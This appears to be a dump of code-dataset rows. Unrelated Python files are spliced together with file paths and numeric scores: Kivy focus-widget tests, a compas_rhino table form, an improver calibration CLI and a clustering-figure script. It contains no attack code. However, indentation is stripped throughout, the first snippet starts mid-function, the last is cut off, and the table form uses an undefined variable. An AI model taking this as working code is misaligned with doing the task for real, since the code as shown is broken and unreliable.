step_1_btn = FocusButton(text='Press me first!')
container_2.add_widget(step_1_btn)
s2.add_widget(container_2)
submit_btn = FocusButton(text='Submit')
manager = FocusScreenManager()
def press_step_1(*args):
app.step_1 = True
def press_to_screen_2(*args):
manager.current = 'screen_2'
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
to_screen_2.bind(on_press=press_to_screen_2)
step_1_btn.bind(on_press=press_step_1)
submit_btn.bind(on_press=submit)
manager.add_widget(s1)
manager.add_widget(s2)
app.root.add_widget(instructions)
app.root.add_widget(manager)
app.root.add_widget(submit_btn)
return True
@run_in_app(app_class=CheckActionApp, timeout=60)
def test_video_player():
target = 5 # seconds
app = App.get_running_app()
container = default_container()
instructions = Label(text=(f'1. Navigate to {target} seconds in the video\n'
'2. Mute the audio'), size_hint_y=0.1)
player = FocusVideoPlayer(source='tests/actual/test_data/mandelbrot.mp4')
submit = FocusButton(text='Submit', size_hint_y=0.1)
def on_submit(*args):
assert isclose(target, player.position, abs_tol=1)
assert player.volume == 0
app.did_action = True
app.stop()
submit.bind(on_press=on_submit)
container.add_widget(instructions)
container.add_widget(player)
container.add_widget(submit)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_tabbed_panel():
app = App.get_running_app()
app.step_1 = False
container = default_container()
instructions = Label(text='Press the button on the next tab, then press Submit.')
tab_btn = FocusButton(text='Press me first')
submit_btn = FocusButton(text='Submit', size_hint_y=0.1)
inner_container = default_container()
ignore_btn = FocusButton(text='Ignore me')
inner_container.add_widget(instructions)
inner_container.add_widget(ignore_btn)
tp = FocusTabbedPanel()
tp.default_tab_content = inner_container
item = TabbedPanelItem(text='Go here')
item.add_widget(tab_btn)
tp.add_widget(item)
def press_ignore(*args): # Auto fail
app.stop()
def press_step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
ignore_btn.bind(on_press=press_ignore)
tab_btn.bind(on_press=press_step_1)
submit_btn.bind(on_press=submit)
container.add_widget(tp)
container.add_widget(submit_btn)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_modal_view():
app = App.get_running_app()
container = default_container()
def show_modal():
view = FocusModalView(focus_return=container, auto_dismiss=False, size_hint=(0.5, 0.5))
dismiss_btn = FocusButton(text='Dismiss this modal', on_press=lambda _: view.dismiss())
view.add_widget(dismiss_btn)
view.open()
def submit(*args):
app.did_action = True
app.stop()
submit_btn = FocusButton(text='Press this after dismissing the modal view', on_press=submit)
container.add_widget(submit_btn)
app.root.add_widget(container)
Clock.schedule_once(lambda _: show_modal())
return True
@run_in_app(app_class=CheckActionApp)
def test_popup():
app = App.get_running_app()
container = default_container()
def show_popup():
inner_container = default_container()
dismiss_btn = FocusButton(text='Dismiss this popup')
view = FocusPopup(title='Popup', content=inner_container, focus_return=container,
auto_dismiss=False, size_hint=(0.5, 0.5))
dismiss_btn.bind(on_press=lambda *args: view.dismiss())
inner_container.add_widget(dismiss_btn)
view.open()
def submit(*args):
app.did_action = True
app.stop()
submit_btn = FocusButton(text='Press this after dismissing the popup', on_press=submit)
container.add_widget(submit_btn)
app.root.add_widget(container)
Clock.schedule_once(lambda _: show_popup())
return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_accordion():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text='Navigate to the next accordion section.')
step_1_btn = FocusButton(text='Press me first')
submit_btn = FocusButton(text='Press me second')
container_1 = default_container()
container_1.add_widget(instructions)
container_2 = default_container()
container_2.add_widget(step_1_btn)
acc = FocusAccordion()
item_1 = FocusAccordionItem()
item_1.add_widget(container_1)
acc.add_widget(item_1)
item_2 = FocusAccordionItem()
item_2.add_widget(container_2)
acc.add_widget(item_2)
acc.select(item_1)
container = default_container()
container.add_widget(acc)
container.add_widget(submit_btn)
def step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
step_1_btn.bind(on_press=step_1)
submit_btn.bind(on_press=submit)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=25)
def test_scroll_view():
app = App.get_running_app()
instructions = Label(text='Look through the scroll area to find the correct button to press.', size_hint_y=0.1)
correct_button = 'Button 3'
scroll_container = FocusGridLayout(cols=10, size_hint=(None, None), size=(1000, 1000))
for _ in range(99):
scroll_container.add_widget(Label(text='Ignore me'))
scroll_container.add_widget(Label(text=correct_button))
button_container = FocusBoxLayout(orientation='horizontal', padding=10, spacing=10, size_hint_y=0.15)
def guess(btn, *args):
if btn.text == correct_button:
app.did_action = True
app.stop()
for i in range(5):
btn = FocusButton(text=f'Button {i}')
btn.bind(on_press=guess)
button_container.add_widget(btn)
container = default_container()
sv = FocusScrollView()
sv.add_widget(scroll_container)
for widg in (instructions, sv, button_container):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=25)
def test_focus_scroll_into_view():
app = App.get_running_app()
instructions = Label(text='Press the button within the ScrollView (by tabbing to it)')
scroll_container = FocusGridLayout(cols=10, size_hint=(None, None), size=(1000, 1000))
for _ in range(99):
scroll_container.add_widget(Label(text='Ignore me'))
def press(*args):
app.did_action = True
app.stop()
target_btn = FocusButton(text='Press me')
target_btn.bind(on_press=press)
scroll_container.add_widget(target_btn)
container = default_container()
first_focus = FocusButton(text='I should have focus first')
first_focus.focus = True
sv = ScrollView()
sv.add_widget(scroll_container)
container.add_widget(instructions)
container.add_widget(first_focus)
container.add_widget(sv)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_focus_switch():
app = App.get_running_app()
instructions = Label(text='Activate all of these switches')
switches = [FocusSwitch() for _ in range(3)]
def done(*args):
if all(switch.active for switch in switches):
app.did_action = True
app.stop()
submit = FocusButton(text='Submit')
submit.bind(on_press=done)
container = default_container()
container.add_widget(instructions)
for switch in switches:
container.add_widget(switch)
container.add_widget(submit)
app.root.add_widget(container)
return True
class TreeViewFocusButton(FocusTreeViewNode, FocusButton):
def __init__(self, **kwargs):
FocusTreeViewNode.__init__(self, **kwargs)
FocusButton.__init__(self, **kwargs)
@run_in_app(app_class=CheckActionApp, timeout=30)
def test_tree_view():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text='Press the first button under the first element, then the second button under the second element.', size_hint_y=0.1)
tv = FocusTreeView(size_hint_y=0.9)
node_1 = FocusTreeViewLabel(text='Go here first', size_hint_y=0.2)
node_2 = FocusTreeViewLabel(text='Go here second', size_hint_y=0.2)
btn_1 = TreeViewFocusButton(text='Press me first')
btn_2 = TreeViewFocusButton(text='Press me second')
fake_button = FocusButton(text='Ignore me')
def step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
btn_1.bind(on_press=step_1)
btn_2.bind(on_press=submit)
tv.add_node(node_1)
tv.add_node(node_2)
tv.add_node(btn_1, node_1)
tv.add_node(btn_2, node_2)
container = default_container()
container.add_widget(instructions)
container.add_widget(tv)
container.add_widget(fake_button)
app.root.add_widget(container)
return True | tests/actual/test_widget_interaction.py | import kivy
kivy.require('1.11.1')
from kivy.app import App
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.scrollview import ScrollView
from kivy.uix.textinput import TextInput
from kivy.uix.tabbedpanel import TabbedPanelItem
from kivy.uix.treeview import TreeViewLabel
import pytest
from math import isclose
from common import run_in_app
from kivy_garden.advancedfocusbehavior import *
def default_container():
return FocusBoxLayout(orientation='vertical', padding=30, spacing=30)
class CheckActionApp(App):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.did_action = False
def stop(self):
super().stop()
assert self.did_action
class CheckFocusActionApp(FocusApp):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.did_action = False
def stop(self):
super().stop()
assert self.did_action
# TODO: move to different file
@run_in_app(app_class=CheckActionApp)
def test_focus_buttons():
app = App.get_running_app()
self = test_focus_buttons
def push_me(*args):
app.did_action = True
app.stop()
container = FocusBoxLayout()
btn = FocusButton(text='Press Enter', on_press=push_me)
container.add_widget(btn)
app.root.add_widget(container)
assert btn.focus
return True
@run_in_app(app_class=CheckActionApp)
def test_cycle_through_focusables():
app = App.get_running_app()
app.step_1 = False
def focus_1(btn, state):
if not state:
return
if app.step_1:
app.did_action = True
app.stop()
def focus_2(btn, state):
if not state:
return
if app.step_1:
app.stop()
else:
app.step_1 = True
def focus_3(btn, state):
if not state:
return
app.stop()
container = default_container()
container.add_widget(Label(text=('Press Tab once to cycle to the next widget, '
'then press Shift+Tab once to cycle back.')))
first = FocusButton(text='button 1')
second = FocusButton(text='button 2')
third = FocusButton(text='button 3')
first.bind(focus=focus_1)
second.bind(focus=focus_2)
third.bind(focus=focus_3)
for btn in (first, second, third):
container.add_widget(btn)
app.root.add_widget(container)
assert first.focus
return True
@run_in_app(app_class=CheckFocusActionApp, timeout=15)
def test_focus_from_nothing():
app = App.get_running_app()
instructions = Label(text='Press any button')
container = default_container()
container.add_widget(instructions)
def press(*args):
app.did_action = True
app.stop()
for _ in range(5):
btn = FocusButton(text='Press me', on_press=press)
container.add_widget(btn)
for widg in container.children:
if hasattr(widg, 'focus'):
widg.focus = False
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_carousel():
app = App.get_running_app()
app.step_1 = False
def press_1(*args):
app.step_1 = True
def press_2(*args):
if app.step_1:
app.did_action = True
app.stop()
car = FocusCarousel(direction='right')
car.add_widget(Label(text='Navigate to the right in the carousel'))
container = default_container()
btn_1 = FocusButton(text='Press me')
btn_2 = FocusButton(text='Press me after you\'ve pressed the other button')
btn_1.bind(on_press=press_1)
btn_2.bind(on_press=press_2)
container.add_widget(btn_1)
car.add_widget(container)
app.root.add_widget(car)
app.root.add_widget(btn_2)
return True
@run_in_app(app_class=CheckActionApp)
def test_checkbox():
app = App.get_running_app()
container = default_container()
lb = Label(text='Activate the checkbox, then press the button below it.')
cb = FocusCheckBox()
btn = FocusButton(text='Test checkbox')
def press_me(*args):
assert cb.active
app.did_action = True
app.stop()
btn.bind(on_press=press_me)
for widg in (lb, cb, btn):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_toggle_button():
app = App.get_running_app()
container = default_container()
lb = Label(text='Activate the toggle button, then press the button below it.')
tb = FocusToggleButton(text='off')
btn = FocusButton(text='Test toggle button')
def update_toggle_label(tbtn, val):
tbtn.text = 'on' if val == 'down' else 'off'
def press_me(*args):
assert tb.state == 'down'
app.did_action = True
app.stop()
tb.bind(state=update_toggle_label)
btn.bind(on_press=press_me)
for widg in (lb, tb, btn):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_slider():
value = 48
app = App.get_running_app()
container = default_container()
instruction_label = Label(text=f'Set the slider to {value}')
pos_label = Label()
slider = FocusSlider()
btn = FocusButton(text='Submit')
def update_pos_label(slider, value):
pos_label.text = str(int(value))
def press_me(*args):
assert int(slider.value) == value
app.did_action = True
app.stop()
slider.bind(value=update_pos_label)
btn.bind(on_press=press_me)
for widg in (instruction_label, pos_label, slider, btn):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_screen_manager():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text=('Press the button on the next screen, then press'
' the button at the bottom of the app.'))
s1 = FocusScreen(name='screen_1')
container_1 = default_container()
to_screen_2 = FocusButton(text='To screen 2 ->')
container_1.add_widget(to_screen_2)
s1.add_widget(container_1)
s2 = FocusScreen(name='screen_2')
container_2 = default_container()
step_1_btn = FocusButton(text='Press me first!')
container_2.add_widget(step_1_btn)
s2.add_widget(container_2)
submit_btn = FocusButton(text='Submit')
manager = FocusScreenManager()
def press_step_1(*args):
app.step_1 = True
def press_to_screen_2(*args):
manager.current = 'screen_2'
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
to_screen_2.bind(on_press=press_to_screen_2)
step_1_btn.bind(on_press=press_step_1)
submit_btn.bind(on_press=submit)
manager.add_widget(s1)
manager.add_widget(s2)
app.root.add_widget(instructions)
app.root.add_widget(manager)
app.root.add_widget(submit_btn)
return True
@run_in_app(app_class=CheckActionApp, timeout=60)
def test_video_player():
target = 5 # seconds
app = App.get_running_app()
container = default_container()
instructions = Label(text=(f'1. Navigate to {target} seconds in the video\n'
'2. Mute the audio'), size_hint_y=0.1)
player = FocusVideoPlayer(source='tests/actual/test_data/mandelbrot.mp4')
submit = FocusButton(text='Submit', size_hint_y=0.1)
def on_submit(*args):
assert isclose(target, player.position, abs_tol=1)
assert player.volume == 0
app.did_action = True
app.stop()
submit.bind(on_press=on_submit)
container.add_widget(instructions)
container.add_widget(player)
container.add_widget(submit)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_tabbed_panel():
app = App.get_running_app()
app.step_1 = False
container = default_container()
instructions = Label(text='Press the button on the next tab, then press Submit.')
tab_btn = FocusButton(text='Press me first')
submit_btn = FocusButton(text='Submit', size_hint_y=0.1)
inner_container = default_container()
ignore_btn = FocusButton(text='Ignore me')
inner_container.add_widget(instructions)
inner_container.add_widget(ignore_btn)
tp = FocusTabbedPanel()
tp.default_tab_content = inner_container
item = TabbedPanelItem(text='Go here')
item.add_widget(tab_btn)
tp.add_widget(item)
def press_ignore(*args): # Auto fail
app.stop()
def press_step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
ignore_btn.bind(on_press=press_ignore)
tab_btn.bind(on_press=press_step_1)
submit_btn.bind(on_press=submit)
container.add_widget(tp)
container.add_widget(submit_btn)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp)
def test_modal_view():
app = App.get_running_app()
container = default_container()
def show_modal():
view = FocusModalView(focus_return=container, auto_dismiss=False, size_hint=(0.5, 0.5))
dismiss_btn = FocusButton(text='Dismiss this modal', on_press=lambda _: view.dismiss())
view.add_widget(dismiss_btn)
view.open()
def submit(*args):
app.did_action = True
app.stop()
submit_btn = FocusButton(text='Press this after dismissing the modal view', on_press=submit)
container.add_widget(submit_btn)
app.root.add_widget(container)
Clock.schedule_once(lambda _: show_modal())
return True
@run_in_app(app_class=CheckActionApp)
def test_popup():
app = App.get_running_app()
container = default_container()
def show_popup():
inner_container = default_container()
dismiss_btn = FocusButton(text='Dismiss this popup')
view = FocusPopup(title='Popup', content=inner_container, focus_return=container,
auto_dismiss=False, size_hint=(0.5, 0.5))
dismiss_btn.bind(on_press=lambda *args: view.dismiss())
inner_container.add_widget(dismiss_btn)
view.open()
def submit(*args):
app.did_action = True
app.stop()
submit_btn = FocusButton(text='Press this after dismissing the popup', on_press=submit)
container.add_widget(submit_btn)
app.root.add_widget(container)
Clock.schedule_once(lambda _: show_popup())
return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_accordion():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text='Navigate to the next accordion section.')
step_1_btn = FocusButton(text='Press me first')
submit_btn = FocusButton(text='Press me second')
container_1 = default_container()
container_1.add_widget(instructions)
container_2 = default_container()
container_2.add_widget(step_1_btn)
acc = FocusAccordion()
item_1 = FocusAccordionItem()
item_1.add_widget(container_1)
acc.add_widget(item_1)
item_2 = FocusAccordionItem()
item_2.add_widget(container_2)
acc.add_widget(item_2)
acc.select(item_1)
container = default_container()
container.add_widget(acc)
container.add_widget(submit_btn)
def step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
step_1_btn.bind(on_press=step_1)
submit_btn.bind(on_press=submit)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=25)
def test_scroll_view():
app = App.get_running_app()
instructions = Label(text='Look through the scroll area to find the correct button to press.', size_hint_y=0.1)
correct_button = 'Button 3'
scroll_container = FocusGridLayout(cols=10, size_hint=(None, None), size=(1000, 1000))
for _ in range(99):
scroll_container.add_widget(Label(text='Ignore me'))
scroll_container.add_widget(Label(text=correct_button))
button_container = FocusBoxLayout(orientation='horizontal', padding=10, spacing=10, size_hint_y=0.15)
def guess(btn, *args):
if btn.text == correct_button:
app.did_action = True
app.stop()
for i in range(5):
btn = FocusButton(text=f'Button {i}')
btn.bind(on_press=guess)
button_container.add_widget(btn)
container = default_container()
sv = FocusScrollView()
sv.add_widget(scroll_container)
for widg in (instructions, sv, button_container):
container.add_widget(widg)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=25)
def test_focus_scroll_into_view():
app = App.get_running_app()
instructions = Label(text='Press the button within the ScrollView (by tabbing to it)')
scroll_container = FocusGridLayout(cols=10, size_hint=(None, None), size=(1000, 1000))
for _ in range(99):
scroll_container.add_widget(Label(text='Ignore me'))
def press(*args):
app.did_action = True
app.stop()
target_btn = FocusButton(text='Press me')
target_btn.bind(on_press=press)
scroll_container.add_widget(target_btn)
container = default_container()
first_focus = FocusButton(text='I should have focus first')
first_focus.focus = True
sv = ScrollView()
sv.add_widget(scroll_container)
container.add_widget(instructions)
container.add_widget(first_focus)
container.add_widget(sv)
app.root.add_widget(container)
return True
@run_in_app(app_class=CheckActionApp, timeout=20)
def test_focus_switch():
app = App.get_running_app()
instructions = Label(text='Activate all of these switches')
switches = [FocusSwitch() for _ in range(3)]
def done(*args):
if all(switch.active for switch in switches):
app.did_action = True
app.stop()
submit = FocusButton(text='Submit')
submit.bind(on_press=done)
container = default_container()
container.add_widget(instructions)
for switch in switches:
container.add_widget(switch)
container.add_widget(submit)
app.root.add_widget(container)
return True
class TreeViewFocusButton(FocusTreeViewNode, FocusButton):
def __init__(self, **kwargs):
FocusTreeViewNode.__init__(self, **kwargs)
FocusButton.__init__(self, **kwargs)
@run_in_app(app_class=CheckActionApp, timeout=30)
def test_tree_view():
app = App.get_running_app()
app.step_1 = False
instructions = Label(text='Press the first button under the first element, then the second button under the second element.', size_hint_y=0.1)
tv = FocusTreeView(size_hint_y=0.9)
node_1 = FocusTreeViewLabel(text='Go here first', size_hint_y=0.2)
node_2 = FocusTreeViewLabel(text='Go here second', size_hint_y=0.2)
btn_1 = TreeViewFocusButton(text='Press me first')
btn_2 = TreeViewFocusButton(text='Press me second')
fake_button = FocusButton(text='Ignore me')
def step_1(*args):
app.step_1 = True
def submit(*args):
if app.step_1:
app.did_action = True
app.stop()
btn_1.bind(on_press=step_1)
btn_2.bind(on_press=submit)
tv.add_node(node_1)
tv.add_node(node_2)
tv.add_node(btn_1, node_1)
tv.add_node(btn_2, node_2)
container = default_container()
container.add_widget(instructions)
container.add_widget(tv)
container.add_widget(fake_button)
app.root.add_widget(container)
return True | 0.321673 | 0.113629 |
from __future__ import print_function
from compas_rhino.forms import Form
try:
from System.Windows.Forms import Button
from System.Windows.Forms import DialogResult
from System.Windows.Forms import DataGridViewColumnSortMode
from System.Windows.Forms import FlowLayoutPanel
from System.Windows.Forms import TableLayoutPanel
from System.Windows.Forms import AnchorStyles
from System.Windows.Forms import FlowDirection
from System.Windows.Forms import BorderStyle
from System.Windows.Forms import DockStyle
from System.Windows.Forms import RowStyle
from System.Windows.Forms import SizeType
except ImportError:
import sys
if 'ironpython' in sys.version.lower():
raise
__all__ = ['TableForm']
class TableForm(Form):
""""""
def __init__(self, columns, rows, title=None, width=None, height=None):
self.columns = columns
self.rows = rows
super(TableForm, self).__init__(title, width, height)
def init(self):
ok = Button()
ok.Text = 'OK'
ok.DialogResult = DialogResult.OK
cancel = Button()
cancel.Text = 'Cancel'
cancel.DialogResult = DialogResult.Cancel
buttonlayout = FlowLayoutPanel()
buttonlayout.Height = 30
buttonlayout.Anchor = AnchorStyles.Bottom | AnchorStyles.Right
buttonlayout.FlowDirection = FlowDirection.RightToLeft
# buttonlayout.BorderStyle = BorderStyle.None
buttonlayout.Controls.Add(cancel)
buttonlayout.Controls.Add(ok)
formlayout = TableLayoutPanel()
formlayout.Dock = DockStyle.Fill
# formlayout.BorderStyle = BorderStyle.None
formlayout.ColumnCount = 1
formlayout.RowCount = 2
formlayout.RowStyles.Add(RowStyle(SizeType.Percent, 100))
formlayout.Controls.Add(table, 0, 0)
formlayout.Controls.Add(buttonlayout, 0, 1)
self.Controls.Add(formlayout)
def on_form_closed(self, sender, e):
pass
class Table():
pass
# ==============================================================================
# Main
# ==============================================================================
if __name__ == '__main__':
headers = ['A', 'B', 'C', 'D']
rows = [[i, i, i, i] for i in range(100)]
form = TableForm(headers, rows)
form.show() | src/compas_rhino/forms/_table.py | from __future__ import print_function
from compas_rhino.forms import Form
try:
from System.Windows.Forms import Button
from System.Windows.Forms import DialogResult
from System.Windows.Forms import DataGridViewColumnSortMode
from System.Windows.Forms import FlowLayoutPanel
from System.Windows.Forms import TableLayoutPanel
from System.Windows.Forms import AnchorStyles
from System.Windows.Forms import FlowDirection
from System.Windows.Forms import BorderStyle
from System.Windows.Forms import DockStyle
from System.Windows.Forms import RowStyle
from System.Windows.Forms import SizeType
except ImportError:
import sys
if 'ironpython' in sys.version.lower():
raise
__all__ = ['TableForm']
class TableForm(Form):
""""""
def __init__(self, columns, rows, title=None, width=None, height=None):
self.columns = columns
self.rows = rows
super(TableForm, self).__init__(title, width, height)
def init(self):
ok = Button()
ok.Text = 'OK'
ok.DialogResult = DialogResult.OK
cancel = Button()
cancel.Text = 'Cancel'
cancel.DialogResult = DialogResult.Cancel
buttonlayout = FlowLayoutPanel()
buttonlayout.Height = 30
buttonlayout.Anchor = AnchorStyles.Bottom | AnchorStyles.Right
buttonlayout.FlowDirection = FlowDirection.RightToLeft
# buttonlayout.BorderStyle = BorderStyle.None
buttonlayout.Controls.Add(cancel)
buttonlayout.Controls.Add(ok)
formlayout = TableLayoutPanel()
formlayout.Dock = DockStyle.Fill
# formlayout.BorderStyle = BorderStyle.None
formlayout.ColumnCount = 1
formlayout.RowCount = 2
formlayout.RowStyles.Add(RowStyle(SizeType.Percent, 100))
formlayout.Controls.Add(table, 0, 0)
formlayout.Controls.Add(buttonlayout, 0, 1)
self.Controls.Add(formlayout)
def on_form_closed(self, sender, e):
pass
class Table():
pass
# ==============================================================================
# Main
# ==============================================================================
if __name__ == '__main__':
headers = ['A', 'B', 'C', 'D']
rows = [[i, i, i, i] for i in range(100)]
form = TableForm(headers, rows)
form.show() | 0.303525 | 0.034036 |
"""CLI to apply rainforests calibration."""
from improver import cli
@cli.clizefy
@cli.with_output
def process(
forecast: cli.inputcube,
*features: cli.inputcube,
model_config: cli.inputjson,
error_percentiles_count: int = 19,
output_realizations_count: int = 100,
threads: int = 1,
):
"""
Calibrate a forecast cube using the Rainforests method.
Ensemble forecasts must be in realization representation. Deterministic forecasts
can be processed to produce a pseudo-ensemble; a realization dimension will be added
to deterministic forecast cubes if one is not already present.
This calibration is done in a situation dependent fashion using a series of
decision-tree models to construct representative error distributions which are
then used to map each input ensemble member onto a series of realisable values.
These series collectively form a super-ensemble, from which realizations are
sampled to produce the calibrated forecast.
Args:
forecast_cube (iris.cube.Cube):
Cube containing the forecast to be calibrated; must be as realizations.
feature_cubes (iris.cube.Cubelist):
Cubelist containing the feature variables (physical parameters) used as inputs
to the tree-models for the generation of the associated error distributions.
Feature cubes are expected to have the same dimensions as forecast_cube, with
the exception of the realization dimension. Where the feature_cube contains a
realization dimension this is expected to be consistent, otherwise the cube will
be broadcast along the realization dimension.
model_config (dict):
Dictionary containing RainForests model configuration data.
error_percentiles_count (int):
The number of error percentiles to apply to each ensemble realization.
The resulting super-ensemble will be of size = forecast.realization.size *
error_percentiles_count.
output_realizations_count (int):
The number of realizations to output for the calibrated ensemble.
These realizations are sampled by taking equispaced percentiles
from the super-ensemble. If None is supplied, then all realizations
from the super-ensemble will be returned.
threads (int):
Number of threads to use during prediction with tree-model objects.
Returns:
iris.cube.Cube:
The forecast cube following calibration.
"""
from iris.cube import CubeList
from improver.calibration.rainforest_calibration import ApplyRainForestsCalibration
return ApplyRainForestsCalibration(model_config, threads).process(
forecast,
CubeList(features),
error_percentiles_count=error_percentiles_count,
output_realizations_count=output_realizations_count,
) | improver/cli/apply_rainforests_calibration.py | """CLI to apply rainforests calibration."""
from improver import cli
@cli.clizefy
@cli.with_output
def process(
forecast: cli.inputcube,
*features: cli.inputcube,
model_config: cli.inputjson,
error_percentiles_count: int = 19,
output_realizations_count: int = 100,
threads: int = 1,
):
"""
Calibrate a forecast cube using the Rainforests method.
Ensemble forecasts must be in realization representation. Deterministic forecasts
can be processed to produce a pseudo-ensemble; a realization dimension will be added
to deterministic forecast cubes if one is not already present.
This calibration is done in a situation dependent fashion using a series of
decision-tree models to construct representative error distributions which are
then used to map each input ensemble member onto a series of realisable values.
These series collectively form a super-ensemble, from which realizations are
sampled to produce the calibrated forecast.
Args:
forecast_cube (iris.cube.Cube):
Cube containing the forecast to be calibrated; must be as realizations.
feature_cubes (iris.cube.Cubelist):
Cubelist containing the feature variables (physical parameters) used as inputs
to the tree-models for the generation of the associated error distributions.
Feature cubes are expected to have the same dimensions as forecast_cube, with
the exception of the realization dimension. Where the feature_cube contains a
realization dimension this is expected to be consistent, otherwise the cube will
be broadcast along the realization dimension.
model_config (dict):
Dictionary containing RainForests model configuration data.
error_percentiles_count (int):
The number of error percentiles to apply to each ensemble realization.
The resulting super-ensemble will be of size = forecast.realization.size *
error_percentiles_count.
output_realizations_count (int):
The number of realizations to output for the calibrated ensemble.
These realizations are sampled by taking equispaced percentiles
from the super-ensemble. If None is supplied, then all realizations
from the super-ensemble will be returned.
threads (int):
Number of threads to use during prediction with tree-model objects.
Returns:
iris.cube.Cube:
The forecast cube following calibration.
"""
from iris.cube import CubeList
from improver.calibration.rainforest_calibration import ApplyRainForestsCalibration
return ApplyRainForestsCalibration(model_config, threads).process(
forecast,
CubeList(features),
error_percentiles_count=error_percentiles_count,
output_realizations_count=output_realizations_count,
) | 0.956237 | 0.491456 |
import os
import numpy as np
from collections import Counter
import matplotlib.pyplot as plt
from pylab import rcParams
from sklearn.cluster import dbscan
from tefingerprint.cluster import DBICAN, SDBICAN
# directory of this script
directory = os.path.dirname(os.path.abspath(__file__))
# figure 1: comparison of DBSCAN DBSCAN* and DBICAN
# read tip positions
points = np.array([1, 2, 2, 3, 3, 4, 4, 4, 5, 6, 6, 8, 11, 12,
12, 13, 13, 13, 14, 14, 14, 15, 15, 16, 18,
23, 25, 26, 27, 27, 28, 29, 30, 31, 33])
# variables
mpts = 10
eps = 5
# DBSCAN labels
cores, dbscan_labels = dbscan(points.reshape(-1, 1),
eps=eps,
min_samples=mpts)
# DBSCAN* labels are same for core points but otherwise -1
dbscanx_labels = np.zeros(len(points), dtype=np.int) - 1
dbscanx_labels[cores] = dbscan_labels[cores]
# DBICAN labels
dbican = DBICAN(min_points=mpts, epsilon=eps)
dbican.fit(points)
dbican_labels = dbican.labels()
# plotting
labels_list = [dbscan_labels, dbscanx_labels, dbican_labels]
name_list = [r'DBSCAN', r'DBSCAN*', 'DBICAN']
title = r'Comparison of Algorithms with $m_{pts}=10$ and $\varepsilon=5$'
legend_labels = ['.', '1', '2']
x_max_ofset = 2
height = 2.5
width = 6
n_row = 3
n_col = 1
rcParams['figure.figsize'] = width, height
x_max = np.max(points) + x_max_ofset
position = np.arange(x_max)
colour = np.zeros(position.shape, dtype='U2')
grey = '#C8C8C8'
colour[:] = grey
fig, ax = plt.subplots(n_row, n_col, sharex='col', sharey='row')
for row in range(n_row):
name = name_list[row]
labels = labels_list[row]
for l in [-1, 0, 1]:
if l is -1:
colour = grey
else:
colour = 'C{0}'.format(l)
counts = np.zeros(x_max, dtype=np.int)
counts_ = Counter(points[labels == l])
for i in range(len(position)):
if i in counts_:
counts[i] = counts_[i]
ax[row].bar(position,
counts,
width=1,
color=colour,
tick_label=position)
if row is 0:
ax[row].arrow(23, 2.5, dx=0, dy=-1,
length_includes_head=True,
head_width=0.5,
head_length=0.2)
if row is 0:
ax[row].set_title(title)
ax[row].get_xaxis().set_ticks([])
ax[row].get_yaxis().set_ticks([])
ax[row].set_ylabel(name)
plt.savefig(directory+'/DBICAN.png')
# figure 2: comparison of DBICAN and SDBICAN
# read tip positions
points = np.array([1, 2, 2, 3, 3, 4, 4, 4, 5, 6, 6, 8, 11, 12,
12, 13, 13, 13, 14, 14, 14, 15, 15, 16, 18])
# variables
mpts = 10
# plot
legend_labels = ['.', '1', '2']
x_max_ofset = 2
height = 5
width = 6
n_row = 10
n_col = 2
rcParams['figure.figsize'] = width, height
x_max = np.max(points) + x_max_ofset
position = np.arange(x_max)
colour = np.zeros(position.shape, dtype='U2')
grey = '#C8C8C8'
colour[:] = grey
fig, ax = plt.subplots(n_row, n_col, sharex='col', sharey='row')
for col in range(n_col):
for row in range(n_row):
mpts = 10
eps = row + 1
if col is 0:
model = DBICAN(mpts, eps)
elif col is 1:
model = SDBICAN(mpts, eps)
model.fit(points)
labels = model.labels()
for l in [-1, 0, 1]:
if l is -1:
colour = grey
else:
colour = 'C{0}'.format(l)
counts = np.zeros(x_max, dtype=np.int)
counts_ = Counter(points[labels == l])
for i in range(len(position)):
if i in counts_:
counts[i] = counts_[i]
ax[row, col].bar(position,
counts,
width=1,
color=colour,
tick_label=position)
ax[row, col].get_xaxis().set_ticks([])
ax[row, col].get_yaxis().set_ticks([])
if row is 0:
ax[row, col].set_title('SDBICAN' if col else 'DBICAN')
if col is 0:
ax[row, col].set_ylabel(r'$\varepsilon={0}$'.format(eps))
plt.savefig(directory+'/SDBICAN.png') | docs/figure/figures.py | import os
import numpy as np
from collections import Counter
import matplotlib.pyplot as plt
from pylab import rcParams
from sklearn.cluster import dbscan
from tefingerprint.cluster import DBICAN, SDBICAN
# directory of this script
directory = os.path.dirname(os.path.abspath(__file__))
# figure 1: comparison of DBSCAN DBSCAN* and DBICAN
# read tip positions
